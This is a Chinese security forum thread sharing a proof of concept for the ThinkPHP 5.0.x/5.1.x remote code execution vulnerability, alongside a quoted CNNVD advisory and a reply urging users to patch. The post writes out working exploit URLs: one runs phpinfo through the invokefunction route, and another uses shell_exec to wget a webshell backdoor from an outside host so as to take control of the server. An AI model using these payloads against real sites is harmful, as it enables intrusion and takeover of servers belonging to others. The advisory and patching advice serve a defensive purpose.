查看: 27725|回复: 1

thinkphp v5.x 远程代码执行漏洞poc

[复制链接]
发表于 2018-12-15 19:18:58 | 显示全部楼层 |阅读模式
本帖最后由 90_ 于 2018-12-16 22:32 编辑

20181216补充:

1.执行phpinfo
[AppleScript] 查看源码 复制代码
http://unhonker.com/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=php%20-r%20'phpinfo();'



2. 利用该漏洞远程执行下载命令,通过wget远程下载一个webshell后门,执行命令从而获得服务器权限。
其攻击URI详情如下:
[AppleScript] 查看源码 复制代码
/admin.php?s=admin/think\app/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=wget+-O+help.php+http%3a%2f%2ftzrj.host.smartgslb.com%2fhelp.php.txt



通过执行wget命令:
wget -O help.php http://tzrj.host.smartgslb.com/help.php.txt

下载webshell。

前言

  近日,国家信息安全漏洞库(CNNVD)收到关于ThinkPHP远程代码执行漏洞(CNNVD-201812-617)情况的报送。成功利用此漏洞的攻击者可以对目标系统进行远程代码执行攻击。ThinkPHP的5.0.x版和5.1.x版等多个版本均受此漏洞影响。目前,该漏洞的部分漏洞验证代码已经公开,同时ThinkPHP官方已经发布更新修复了该漏洞,建议受该漏洞影响的ThinkPHP用户尽快采取修补措施。

  危害影响

  成功利用此漏洞的攻击者可以对目标系统进行远程代码执行攻击。目前,该漏洞的部分漏洞验证代码已在互联网上公开,近期被利用的可能性较大。
受漏洞影响版本如下:
ThinkPHP 5.0.x、5.1.x。

screenshot.png

   
poc
thinkphp_rce_poc-master.zip (203.16 KB, 下载次数: 4)
回复

使用道具 举报

发表于 4 天前 | 显示全部楼层

Re: thinkphp v5.x 远程代码执行漏洞poc

感谢楼主分享,这个漏洞确实影响很大,尤其是5.0.x和5.1.x版本的用户要特别注意。官方的补丁已经出了,建议受影响的站点尽快升级或修复,避免被利用。楼主提供的poc也很有参考价值,方便安全测试和自查。
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 注册

本版积分规则

指导单位

江苏省公安厅

江苏省通信管理局

浙江省台州刑侦支队

DEFCON GROUP 86025

Hacking Group 021A

旗下站点

态势感知中心

应急响应中心

红盟安全

联系我们

官方QQ群:112851260

官方邮箱:security#ihonker.org(#改成@)

官方核心成员

关注微信公众号

Archiver|手机版|小黑屋| ( 沪ICP备2021026908号 )

GMT+8, 2026-5-23 22:32 , Processed in 0.027230 second(s), 20 queries , Gzip On, Redis On.

Powered by ihonker.com

Copyright © 2015-现在.

  • 返回顶部